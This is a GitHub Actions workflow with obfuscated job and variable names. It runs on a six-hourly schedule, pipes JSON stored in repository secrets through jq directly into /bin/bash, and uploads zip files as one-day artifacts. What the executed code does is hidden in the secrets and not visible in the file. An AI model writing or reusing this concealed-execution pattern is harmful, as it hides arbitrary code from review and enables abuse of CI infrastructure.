name: zhuhougongshun
on:
  workflow_dispatch:

  schedule:
    - cron: '44 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhuhougongshun
        env:
          mmri91872: ${{ secrets.mmri91872 }}
        run: |
          printf '%s' "$mmri91872" | jq -r .qus699 | /bin/bash
          printf '%s' "$rpl7156" | jq -r .tjj4 | /bin/bash
          printf '%s' "$zm7837" | jq -r .jkjib12 | /bin/bash
          echo $ukip5284 | jq -r .ipf3717 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: XxjmLBSf
          path: "*.zip"
          retention-days: 1
